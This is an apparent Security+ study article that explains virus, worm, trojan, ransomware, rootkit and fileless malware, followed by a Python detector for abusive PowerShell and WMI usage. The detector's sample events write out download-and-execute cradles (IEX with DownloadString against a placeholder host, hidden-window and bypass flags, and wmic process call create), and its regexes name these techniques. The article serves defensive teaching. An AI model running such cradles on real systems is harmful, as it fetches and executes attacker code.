
Security Concepts

Malware Types Explained: Virus vs Worm vs Trojan vs Ransomware vs Rootkit

Not all malware is the same. Understanding the differences between viruses, worms, trojans, ransomware, rootkits, and other malware types is essential for the Security+ exam and real-world incident response.

CyberPath Team·2026-06-29·10 min

Viruses and Worms: Self-Replicating Malware

A virus is malicious code that attaches itself to a legitimate program or file. It requires user action to spread (opening a file, running a program). Types: boot sector virus (infects the boot sector or Master Boot Record so it runs before the OS), file infector (attaches to executables such as .exe files), macro virus (infects document macros in Office-style files), and polymorphic virus (rewrites or re-encrypts its own code on each infection so signature scanners never see the same byte pattern twice).

A worm is self-replicating and spreads without human interaction. Worms exploit network vulnerabilities to move from system to system automatically. WannaCry (2017) used an SMBv1 vulnerability (MS17-010, exploited via the leaked EternalBlue code) to spread globally in hours, encrypting files and demanding ransom; it is both a worm and ransomware, which is why it spread far faster than phishing-delivered ransomware. Unlike viruses, worms are standalone programs that don't need a host file.

Exam tip: Viruses need a host file and user action; worms are standalone and self-replicating over networks.

Trojans and RATs: Disguised Malware

A Trojan (Trojan horse) appears as legitimate software but contains malicious code. Unlike viruses, trojans don't replicate; they trick users into installing them. Common trojan types: backdoor trojan (gives the attacker remote control), banking trojan (steals financial credentials; Zeus is the classic example, and Emotet started as one before becoming a general-purpose loader), dropper or downloader trojan (a dropper carries a second payload inside itself, a downloader fetches it from the attacker's server), and infostealer trojan (harvests passwords, session cookies, and other data).

A Remote Access Trojan (RAT) provides the attacker with full remote control of the infected system. The attacker can browse files, capture keystrokes, activate webcams, and use the system as a pivot point. RATs are commonly delivered through phishing emails with malicious attachments.

Ransomware: The Most Damaging Malware

Ransomware encrypts files and demands payment (usually cryptocurrency) for the decryption key. Modern ransomware uses double extortion: encrypts files AND steals data, threatening to leak it if the ransom isn't paid.

Famous examples: WannaCry (2017), NotPetya (2017, which caused an estimated $10B+ in damages and was effectively a wiper, since paying did not produce a working decryption path), Ryuk (targeted large organizations), REvil/Sodinokibi (Ransomware-as-a-Service, where affiliates run the attacks and the operators take a cut), and LockBit (the most active ransomware group in 2023-2024).

Prevention: the 3-2-1 backup rule (3 copies, 2 media types, 1 offsite) with at least one copy offline or immutable so the ransomware cannot encrypt the backups too, and restores tested regularly; patch management; restricting or removing internet-exposed RDP and enforcing MFA on remote access; email filtering; EDR; and user awareness training. Paying the ransom doesn't guarantee data recovery, and it does nothing about data that has already been exfiltrated.

Rootkits: Hidden Persistence

A rootkit is designed to hide its presence on a system. It modifies the operating system to conceal processes, files, registry keys, and network connections from security tools. Kernel-mode rootkits run at the OS kernel level and are extremely difficult to detect while the OS is running.

Rootkit detection often requires booting from trusted external media (a clean OS image) so the suspect disk is read as plain data, then comparing system files against known-good hashes or vendor signatures; any scanner that runs on top of the compromised kernel is asking the rootkit to report on itself. Some rootkits (bootkits) infect the Master Boot Record (MBR) or UEFI firmware, so they persist after the OS is reinstalled, and a firmware implant survives even a disk replacement. Secure Boot and measured boot with a TPM exist precisely to catch tampering at this layer.

Exam tip: Rootkits hide from the OS — detection requires offline scanning. Boot from trusted media to detect and remove.

Other Important Malware Types

Spyware — monitors user activity (keystrokes, browsing habits, credentials) without consent. Keyloggers are a type of spyware.

Botnet — a network of infected computers (bots) controlled by a command-and-control (C2) server. Used for DDoS attacks, spam, credential stuffing, and cryptomining.

Fileless Malware — runs in memory without writing to disk. Uses legitimate system tools (PowerShell, WMI, .NET) to execute malicious code. Evades traditional antivirus because there's no file to scan.

Logic Bomb — malicious code that triggers when a specific condition is met (date, user action, file deletion). Often planted by disgruntled employees.

Adware — displays unwanted advertisements, often bundled with free software. May collect browsing data for targeting.
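Because fileless malware leaves no file to scan, detection shifts to the command lines and script blocks of the legitimate tools it abuses. The following is an added example (not from the original page or from any vendor's ruleset) showing that idea in Python: a handful of heuristic indicators for abusive PowerShell and WMI usage, applied to constructed process-creation events. The indicator patterns are illustrative choices for this example, the sample events are made up, and example.invalid is a reserved name that resolves nowhere. The one non-obvious step is decoding -EncodedCommand, which PowerShell takes as base64 of UTF-16LE text, so that the same indicators can be checked against what the encoded payload actually does.

```python
import base64
import re

# Heuristic indicators of living-off-the-land PowerShell/WMI use. These are
# illustrative patterns for this example, not a complete or vendor ruleset.
INDICATORS = {
    "encoded_command": re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I),
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I),
    "in_memory_exec": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
    "hidden_window": re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I),
    "bypass_policy": re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I),
    "wmi_spawn": re.compile(r"wmic(?:\.exe)?\s+.*process\s+call\s+create", re.I),
}


def decode_encoded_command(cmdline):
    """-EncodedCommand carries base64 of UTF-16LE text; decode it so the
    indicators can be applied to the payload and not just to the wrapper.
    Returns None when there is no encoded argument or it does not decode."""
    m = INDICATORS["encoded_command"].search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command_line(cmdline):
    """Return (sorted indicator names, decoded payload or None). Indicators that
    fired on the decoded -EncodedCommand text are prefixed with 'decoded:'."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(cmdline)}
    decoded = decode_encoded_command(cmdline)
    if decoded:
        hits |= {"decoded:" + name for name, rx in INDICATORS.items()
                 if name != "encoded_command" and rx.search(decoded)}
    return sorted(hits), decoded


def triage(events):
    """events: iterable of dicts with 'image' and 'cmdline', the shape of
    process-creation telemetry (Sysmon Event ID 1, EDR process events).
    Returns only the events on which at least one indicator fired."""
    findings = []
    for ev in events:
        hits, decoded = score_command_line(ev["cmdline"])
        if hits:
            findings.append({"image": ev["image"], "hits": hits, "decoded": decoded})
    return findings


def encode_for_powershell(script):
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry for this example; these are not real logs.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
SAMPLE_EVENTS = [
    {"image": "powershell.exe", "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -EncodedCommand " + encode_for_powershell(CRADLE)},
    {"image": "powershell.exe",
     "cmdline": 'powershell.exe -nop -w hidden -ep bypass -c "' + CRADLE + '"'},
    {"image": "wmic.exe",
     "cmdline": 'wmic.exe process call create "powershell -w hidden -c ' + CRADLE + '"'},
]


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["image"], finding["hits"])
        if finding["decoded"]:
            print("  decoded payload:", finding["decoded"])
```

The benign backup script produces no findings; the three abusive lines do, and the encoded one is only understood because the payload was decoded first. In production these heuristics are one input to a score, not a verdict: PowerShell script block logging (Event ID 4104) and AMSI see the de-obfuscated script regardless of how it was launched, and administrators legitimately use encoded commands, so tune against your own baseline before alerting.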